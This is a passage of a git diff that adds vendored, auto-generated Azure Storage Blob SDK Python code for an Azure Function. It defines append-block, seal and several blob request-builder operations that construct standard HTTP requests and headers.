Optional["_models.AppendPositionAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Append Block operation commits a new block of data to the end of an existing append blob + where the contents are read from a source URL. The Append Block operation is permitted only if + the blob was created with x-ms-blob-type set to AppendBlob. Append Block is supported only on + version 2015-02-21 or later. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param content_length: The length of the request. + :type content_length: long + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting Timeouts for Blob Service Operations. Default value is None.
+ :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _max_size = None + _append_position = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if 
source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_append_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + source_url=source_url, + content_length=content_length, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.append_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: 
ignore + + + @distributed_trace + def seal( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + append_position_access_conditions=None, # type: Optional["_models.AppendPositionAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Seal operation seals the Append Blob to make it read-only. Seal is supported only on + version 2019-12-12 or later. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :keyword comp: comp. Default value is "seal". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "seal") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _append_position = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + if append_position_access_conditions is not None: + _append_position = append_position_access_conditions.append_position + + request = build_seal_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + append_position=_append_position, + template_url=self.seal.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if
response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + seal.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_blob_operations.py new file mode 100644 index 0000000..fbd0b9a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_blob_operations.py @@ -0,0 +1,4443 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_download_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + range_get_content_md5 = kwargs.pop('range_get_content_md5', None) # type: Optional[bool] + range_get_content_crc64 = kwargs.pop('range_get_content_crc64', None) # type: Optional[bool] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if range_get_content_md5 is not None: + _header_parameters['x-ms-range-get-content-md5'] = _SERIALIZER.header("range_get_content_md5", range_get_content_md5, 'bool') + if range_get_content_crc64 is not None: + _header_parameters['x-ms-range-get-content-crc64'] = _SERIALIZER.header("range_get_content_crc64", range_get_content_crc64, 'bool') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + 
_header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not 
None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="HEAD", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_delete_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + delete_snapshots = kwargs.pop('delete_snapshots', None) # type: Optional[Union[str, "_models.DeleteSnapshotsOptionType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_delete_type = kwargs.pop('blob_delete_type', "Permanent") # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if blob_delete_type is not None: + _query_parameters['deletetype'] = _SERIALIZER.query("blob_delete_type", blob_delete_type, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if delete_snapshots is not None: + _header_parameters['x-ms-delete-snapshots'] = _SERIALIZER.header("delete_snapshots", delete_snapshots, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 
'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="DELETE", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_undelete_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "undelete") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_expiry_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "expiry") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + expiry_options = kwargs.pop('expiry_options') # type: Union[str, "_models.BlobExpiryOptions"] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + expires_on = kwargs.pop('expires_on', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['x-ms-expiry-option'] = _SERIALIZER.header("expiry_options", expiry_options, 'str') + if expires_on is not None: + _header_parameters['x-ms-expiry-time'] = _SERIALIZER.header("expires_on", expires_on, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_http_headers_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if blob_content_disposition is not None: + 
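+        # x-ms-blob-content-disposition, like the conditional headers above, is
+        # serialized only when the caller supplied the matching keyword argument;
+        # properties left unset are never placed on the wire.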
_header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_immutability_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = 